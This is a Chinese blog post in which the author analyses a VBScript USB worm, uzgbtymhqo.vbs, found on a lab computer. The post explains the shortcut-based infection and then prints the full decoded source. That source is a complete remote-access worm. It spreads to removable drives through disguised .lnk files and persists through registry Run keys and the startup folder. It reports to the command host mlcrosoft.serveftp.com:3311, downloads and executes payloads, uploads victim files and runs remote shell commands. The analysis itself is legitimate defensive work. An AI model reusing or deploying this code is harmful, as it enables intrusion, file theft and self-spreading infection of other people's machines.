实验室缉毒记之uzgbtymhqo.vbs

最新推荐文章于 2019-09-01 15:14:03 发布
最新推荐文章于 2019-09-01 15:14:03 发布
阅读量2.4k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: u盘 病毒
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014006264/article/details/46814339
版权

去年的事情了,写下来记一下吧。

周三在机房插上U盘后,周四的数据库上机发现U盘里所有东西都变成lnk,如下图:


随便打开一个lnk内容如下:
C:\windows\system32\cmd.exe /c start uzgbtymhqo.vbs&start explorer PowerDesigner15&exit


主要是这个uzgbtymhqo.vbs不知道是干什么的。
百度一下,有东西


所以这个病毒在小白双击这个lnk文件时,运行这个vbs然后在资源管理器中打开原来被隐藏的那个正常的文件,感觉上好像是直接打开我要的文件夹一样,没有什么异常。到底这个东西做了什么,唯有把代码找到才知道了。
于是打开 uzgbtymhqo.vbs



上面那一大堆整齐的鸟文原来是Base64编码后的东西。
最后执行的就是这么一个命令


于是,找到一段代码


费了一些时间,把这个变量的值输出到记事本,编码后有72kb的vbs文件,解码后还有13kb。
快看看都干了什么。。


作者的skype都在这里了。。这是打广告吗?
根据配置信息,是在
mlcrosoft.serveftp.com的 3311端口与肉鸡建立的远程连接。好狠呀有木有,mlcrosoft.serveftp.com初看还以为是微软的ftp服务器呢。
mlcrosoft.serveftp.com一看是个伊拉克的主机。。。
病毒藏身在系统的临时文件的目录里。然后就是动我的文件系统,发送request,加开机启动项之类的(在注册表两个地方加了,然后在start文件夹里也加了。)
开机启动:

肉鸡上线,执行命令


这两天有事无事都看看有没有可疑的连接,没发现那个伊拉克的ip,应该没事。。
*****************************************************************************************************************************************
*****************************************************************************************************************************************
下面贴上源代码:

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "mlcrosoft.serveftp.com"
port = 3311
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

HeHH0626
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Virus_lnk
ahoo110的博客
08-14 1864
本篇讲常见的lnk样本.
vbs压缩和解压zip,vbs压缩zip,vbs解压zip
07-06
vbs解压和压缩zip的,都有了,好用才放上来给大家下载,代码来自网上,整理一下,方便大家! 不是调用winrar的那种, 主要用到 Shell.Application对象
SampleOnlyForTest_uzgbtymhqo.vbs.zip
08-12
VBS样本快速分析
uzgbtymhqo.vbs服务器端测试代码编写
u014006264的专栏
07-09 1511
虽然是一个很小的vbs病毒,但是功能也是足够齐全的,会下载上传文件,删除文件,枚举进程,查看系统相关的信息,更新木马,查看磁盘目录及目录下的文件。 苦于没有服务器端,自己动手写了一个。 思路:用C++动态更新php文件内容,而php文件则作为客户端请求的响应脚本。如需执行命令只需在C++中输入即可。 运行界面: 服务器端目录如下: 主控php代码:(在is-rec
工作中样本处理流程
ahoo110的博客
08-12 380
样本处理流程
数据挖掘在缉毒工作中的应用.pdf
07-14
数据预处理主要是清理原始数据,使之适应建模要求,如标准化处理、数据过滤与匹配、数据净化等;数据转换则是将数据转换为适合挖掘的形式,常用的数据转换方法有平滑、聚集、数据概化、规范化、属性构造等。 接下来...
防黑缉毒禽木马之绝命追杀(第三版)光盘.rar
10-05
防黑缉毒禽木马之绝命追杀(第三版)光盘文件
九年级科学上学期9月月考试题(普通班、实验B班) 试题.doc
11-09
3. 实验操作规范:这部分内容可能是关于实验室安全操作的题目,比如正确处理化学品、使用实验器材的方法等。 4. 化学反应类型:冶炼金属锑的过程中的反应2Sb2O3 + 3C → 2Sb + 3CO是置换反应,因为金属氧化物与非...
广东省河源市中英文实验学校2020届九年级化学下学期第一次月考试题(无答案).doc
10-11
- 题目2涉及到分子的不断运动,缉毒犬能嗅到毒品是因为毒品分子扩散到了空气中。 3. **金属与酸的反应**: - 题目3提到金属与酸的反应,铁与酸反应不能生成氯化铁,因为铁在置换反应中生成亚铁离子,所以生成的是...
写10000字的缉毒警察故事
最新发布
02-14
这是一个关于缉毒警察的故事: 某日,一位警察叫马克去执行一项任务:缉毒。他被派往一个著名的缉毒枢纽,在那里,毒品流通最为活跃。 马克抵达现场后,他发现当地的犯罪活动比他想象的要严重得多。他立刻联系警局...
我是如何惩罚骗子的
u014006264的专栏
07-09 3615
这是去年的事了。 偶然在朋友圈看到一条信息,说是分享点赞截图就送手机的。很可能是骗子。我就跟进了一下,果然是个骗子。骗邮费。如图 拿这个邮箱去各种社工库都找不到任何相关的信息,也没查到注册信息。应该是一个专门骗钱的小号。 最后想到在支付宝的登陆页面填写忘记密码,可以给手机发短信。于是就学了python,写了几句代码,达到了目的,由于接口限制,15分钟内只能发送
vbs混淆脚本分析
Cosmopolitan的博客
09-01 4290
这里是混淆的代码 L = 0 : If (L = 0) Then : X = "Ͳ·Φͫνΰήκίΰνͫ΅ͫγκπίδιδͫͳήʹͫξζτλΰͫ΅ͫγκπίδιδ͸ασͫΨΉ͕͕͘͘ͲΈ͸Έ͸Έ͸Έ͸ΈͫήκιαδβͫΈ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͸Έ͕͕͘͘γκξοͫΈͫͭρδΰςδ͹λπέηδήρθ͹ήκθ͕ͭ͘λκνοͫΈͫͿͿ͕͘διξοάηηίδνͫΈͫͭͰοΰθ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值